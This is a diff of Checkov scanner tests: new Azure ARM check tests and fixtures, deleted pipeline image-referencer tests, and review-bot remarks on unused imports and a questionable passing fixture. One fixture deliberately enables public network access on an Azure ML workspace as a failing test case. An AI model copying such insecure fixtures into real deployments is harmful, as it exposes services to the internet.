+class TestMySQLPublicAccessDisabled(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_TestMySQLPublicAccessDisabled"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.DBforMySQL/servers.pass",
+ }
+ failing_resources = {
+ "Microsoft.DBforMySQL/servers.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+if __name__ == "__main__":
+ unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..a60ceeb8af7
--- /dev/null
+++ b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py
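Review bot: `import os` at the top of this file is never used and should be dropped; the same unused import appears in test_MySQLServerMinTLSVersion.py, which additionally ends with two stray blank lines after `unittest.main()`. The fixture directory is referenced as `example_TestMySQLPublicAccessDisabled`, the only one in this commit that carries a `Test` prefix instead of the `example_<CheckName>` form used by the sibling tests; if that directory really exists under that name the test works, but renaming it to `example_MySQLPublicAccessDisabled` would keep the convention consistent.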
@@ -0,0 +1,44 @@
+import os
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MySQLServerMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMySQLServerMinTLSVersion(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_MySQLServerMinTLSVersion"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.DBforMySQL/servers.pass",
+ }
+ failing_resources = {
+ "Microsoft.DBforMySQL/servers.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertSetEqual(passing_resources, passed_check_resources)
+ self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
+
+
diff --git a/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py
new file mode 100644
index 00000000000..cc0a40f5e9f
--- /dev/null
+++ b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.StorageSyncPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestStorageSyncPublicAccessDisabled(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_StorageSyncPublicAccessDisabled"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.StorageSync/storageSyncServices.pass",
+ }
+ failing_resources = {
+ "Microsoft.StorageSync/storageSyncServices.fail1",
+ "Microsoft.StorageSync/storageSyncServices.fail2",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
new file mode 100644
index 00000000000..6cc0925b453
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
@@ -0,0 +1,7 @@
+pass:
+ - "Microsoft.MachineLearningServices/workspaces.pass"
+ - "Microsoft.MachineLearningServices/workspaces.pass2"
+fail:
+ - "Microsoft.MachineLearningServices/workspaces.fail"
+evaluated_keys:
+ - 'properties/publicNetworkAccess'
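Review bot: The AzureMLWorkspacePublicNetwork expected.yaml lists `workspaces.pass2` as compliant, and the pass2.json fixture added in this commit has an empty `properties` block, so the policy is being pinned to accept a template that omits `publicNetworkAccess` entirely. As far as I know the platform default for Microsoft.MachineLearningServices/workspaces when that property is omitted is Enabled, which would make the minimal template most people write exactly the case the check misses; either the policy should demand an explicit `Disabled` (moving pass2 under `fail:`) or the reason for treating absence as compliant should be recorded in the check's metadata. The file also mixes `"…"` and `'…'` quoting between the resource lists and `evaluated_keys`; one style is enough.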
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json
new file mode 100644
index 00000000000..42f38467201
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "fail",
+ "location": "West US",
+ "properties": {
+ "publicNetworkAccess": "Enabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json
new file mode 100644
index 00000000000..1c959d41049
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "pass",
+ "location": "West US",
+ "properties": {
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json
new file mode 100644
index 00000000000..6161a6b423d
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json
@@ -0,0 +1,13 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "pass2",
+ "location": "West US",
+ "properties": {}
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/test_yaml_policies.py b/tests/arm/graph_builder/checks/test_yaml_policies.py
index 5aa84eaae5b..e7789d79b5e 100644
--- a/tests/arm/graph_builder/checks/test_yaml_policies.py
+++ b/tests/arm/graph_builder/checks/test_yaml_policies.py
@@ -40,6 +40,9 @@ def setUp(self) -> None: def test_AzureSpringCloudConfigWithVnet(self): self.go("AzureSpringCloudConfigWithVnet") + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") + def test_registry_load(self): registry = self.get_checks_registry() self.assertGreater(len(registry.checks), 0)
diff --git a/tests/azure_pipelines/image_referencer/__init__.py b/tests/azure_pipelines/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml
deleted file mode 100644
index 69138e5084c..00000000000
--- a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml
+++ /dev/null
@@ -1,45 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -stages: -- stage: Example - jobs: - - job: FailNoTag - displayName: FailNoTagDisplayName - pool: - vmImage: 'ubuntu-18.04' - steps: - - task: Docker@2 - inputs: - container: postgres:14.2 - - - job: PassDigest - pool: - vmImage: 'ubuntu-18.04' - - container: nginx:1.17 - - steps: - - script: printenv - -jobs: -- job: MyJob - container: ruby:2.6 - pool: - vmImage: windows-latest - steps: - - script: echo "Running in a container based on myorg/mycontainer:1.0" -- job: MyJob2 - container: - image: ruby:2.6 - pool: - vmImage: ubuntu-latest - steps: - - script: echo "Running in a container based on ruby:2.6" \ No newline at end of file diff --git a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml deleted file mode 100644 index 7f54262b530..00000000000 --- a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml +++ /dev/null @@ -1,15 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -jobs: -- job: PassTag - pool: - vmImage: 'ubuntu-18.04' - container: redis:latest \ No newline at end of file diff --git a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py b/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py deleted file mode 100644 index 15d932d1474..00000000000 --- a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py +++ /dev/null 
@@ -1,528 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager - - -def test_provider_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": "MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - 
"vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_provider_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - 
"__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert not images - -def test_manager_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": 
"MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - "vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_manager_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, 
- "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - "__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/azure_pipelines/image_referencer/test_runner.py b/tests/azure_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 57bd9faa3e6..00000000000 --- a/tests/azure_pipelines/image_referencer/test_runner.py +++ /dev/null 
@@ -1,57 +0,0 @@
-from pathlib import Path
-
-from checkov.common.output.report import CheckType
-
-from checkov.common.bridgecrew.bc_source import get_source_type
-from checkov.azure_pipelines.runner import Runner
-
-from checkov.runner_filter import RunnerFilter
-from pytest_mock import MockerFixture
-
-from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async
-
-RESOURCES_PATH = Path(__file__).parent / "resources/single_image"
-
-
-def test_azure_pipelines_workflow(mocker: MockerFixture):
- from checkov.common.bridgecrew.platform_integration import bc_integration
- file_name = "azure-pipelines.yaml"
- image_name = "redis:latest"
- test_file = RESOURCES_PATH / file_name
-
- runner_filter = RunnerFilter(run_image_referencer=True)
- bc_integration.bc_source = get_source_type("disabled")
-
- mocker.patch(
- "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
- side_effect=mock_get_image_cached_result_async,
- )
- mocker.patch(
- "checkov.common.images.image_referencer.get_license_statuses_async",
- side_effect=mock_get_license_statuses_async,
- )
-
- reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
- assert len(reports) == 2
-
- azure_pipelines_report = next(report for report in reports if report.check_type == CheckType.AZURE_PIPELINES)
- sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
-
- assert len(azure_pipelines_report.resources) == 0
- assert len(azure_pipelines_report.passed_checks) == 1
- assert len(azure_pipelines_report.failed_checks) == 2
- assert len(azure_pipelines_report.skipped_checks) == 0
- assert len(azure_pipelines_report.parsing_errors) == 0
-
-
- assert sca_image_report.image_cached_results[0]["dockerImageName"] == image_name
- assert sca_image_report.image_cached_results[0]["packages"] == [
- {"type": "os", "name": "tzdata", "version":
"2021a-1+deb11u5", "licenses": []}
- ]
-
- assert len(sca_image_report.passed_checks) == 1
- assert len(sca_image_report.failed_checks) == 4
- assert len(sca_image_report.image_cached_results) == 1
- assert len(sca_image_report.skipped_checks) == 0
- assert len(sca_image_report.parsing_errors) == 0
diff --git a/tests/circleci_pipelines/image_referencer/__init__.py b/tests/circleci_pipelines/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/circleci_pipelines/image_referencer/conftest.py b/tests/circleci_pipelines/image_referencer/conftest.py
deleted file mode 100644
index e0fed1f5cd8..00000000000
--- a/tests/circleci_pipelines/image_referencer/conftest.py
+++ /dev/null
@@ -1,260 +0,0 @@ -from __future__ import annotations -import pytest - -from checkov.common.images.image_referencer import Image - - -@pytest.fixture -def file_path() -> str: - return ".circleci/config.yml" - - -@pytest.fixture -def circleci_config_with_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "image-executor": { - "docker": { - "image": "mongo:2.6.8", - "__startline__": 16, - "__endline__": 18 - }, - "__startline__": 15, - "__endline__": 18 - }, - "__startline__": 10, - "__endline__": 18 - }, - "jobs": { - "test-docker-versioned-img": { - "docker": [ - { - "image": "mongo:2.6.8", - "__startline__": 21, - "__endline__": 22 - } - ], - "steps": [ - "some-step" - ], - "__startline__": 20, - "__endline__": 25 - }, - "__startline__": 19, - "__endline__": 25 - }, - "__startline__": 5, - "__endline__": 25 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_with_images_config(circleci_config_with_images_definitions, file_path) \ - -> tuple[str, dict]: - return file_path, circleci_config_with_images_definitions.get(file_path) - - -@pytest.fixture -def circleci_config_no_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "__startline__": 10, - "__endline__": 14 - }, - "jobs": { - "test-macos-image": { - "macos": { - "xcode": "9.4.1", - "__startline__": 17, - "__endline__": 18 - }, - 
"steps": [ - "some-step" - ], - "__startline__": 16, - "__endline__": 21 - }, - "test-machine-default": { - "executor": { - "name": "win/default-executor", - "__startline__": 23, - "__endline__": 24 - }, - "steps": [ - "some-step" - ], - "__startline__": 22, - "__endline__": 27 - }, - "__startline__": 15, - "__endline__": 27 - }, - "__startline__": 5, - "__endline__": 27 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_no_images_config(circleci_config_no_images_definitions, file_path) -> tuple[str, dict]: - return file_path, circleci_config_no_images_definitions.get(file_path) - - -@pytest.fixture -def circle_ci_image1(file_path) -> Image: - image = Image( - end_line=18, - start_line=16, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='executors(image-executor).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def circle_ci_image2(file_path) -> Image: - image = Image( - end_line=22, - start_line=21, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def image_cached_result() -> dict: - return { - "results": [ - { - "id": "sha256:9dbc24674f25eb449df11179ed3717c47348fb3aa985ae14b3936d54c2c09dde", - "name": "postgres:14.2", - "distro": "Debian GNU/Linux 11 (bullseye)", - "distroRelease": "bullseye", - "digest": "sha256:2c954f8c5d03da58f8b82645b783b56c1135df17e650b186b296fa1bb71f9cfd", - "collections": [ - "All" - ], - "packages": [ - { - "type": "os", - "name": "base-files", - "version": "11.1+deb11u3", - "licenses": [ - "GPL" - ] - } - ], - "compliances": [], - "complianceDistribution": { - "critical": 0, - "high": 2, - "medium": 0, - "low": 0, - "total": 2 - }, - "complianceScanPassed": True, - "vulnerabilities": [ - ], - "vulnerabilityDistribution": { - "critical": 9, - "high": 26, - "medium": 8, - "low": 17, - "total": 60 - }, - "vulnerabilityScanPassed": True - } - ] - } - - -@pytest.fixture 
-def image_cached_results_for_report() -> tuple: - return ( - { - 'image_name': 'redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673', - 'related_resource_id': 'jobs(test-docker-hash-img).docker.image[1](redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'buildpack-deps:latest', - 'related_resource_id': 'jobs(test-docker-latest-img).docker.image[1](buildpack-deps:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'postgres:14.2', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[2](postgres:14.2)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-echo).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject2).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-curl-secret).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] 
- }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject-ci-vars).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'executors(image-executor).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - } - ) diff --git a/tests/circleci_pipelines/image_referencer/test_manager.py b/tests/circleci_pipelines/image_referencer/test_manager.py deleted file mode 100644 index 92ab28b87e6..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_manager.py +++ /dev/null 
@@ -1,43 +0,0 @@ -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images - -def test_extract_images_from_workflow_nested(circle_ci_filepath_workflow_no_images_config): - file_path = '/tmp/test_path' - config = { - 'workspace_root': '/go/src/github.com/gruntwork-io/terragrunt', - 'defaults': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], '__startline__': 3, '__endline__': 8 - }, - 'jobs': { - 'install_dependencies': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], 'steps': ['checkout'], '__startline__': 11, '__endline__': 32 - } - }, '__startline__': 1, '__endline__': 143 - } - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images 
diff --git a/tests/circleci_pipelines/image_referencer/test_provider.py b/tests/circleci_pipelines/image_referencer/test_provider.py deleted file mode 100644 index 4f342a9000b..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_provider.py +++ /dev/null 
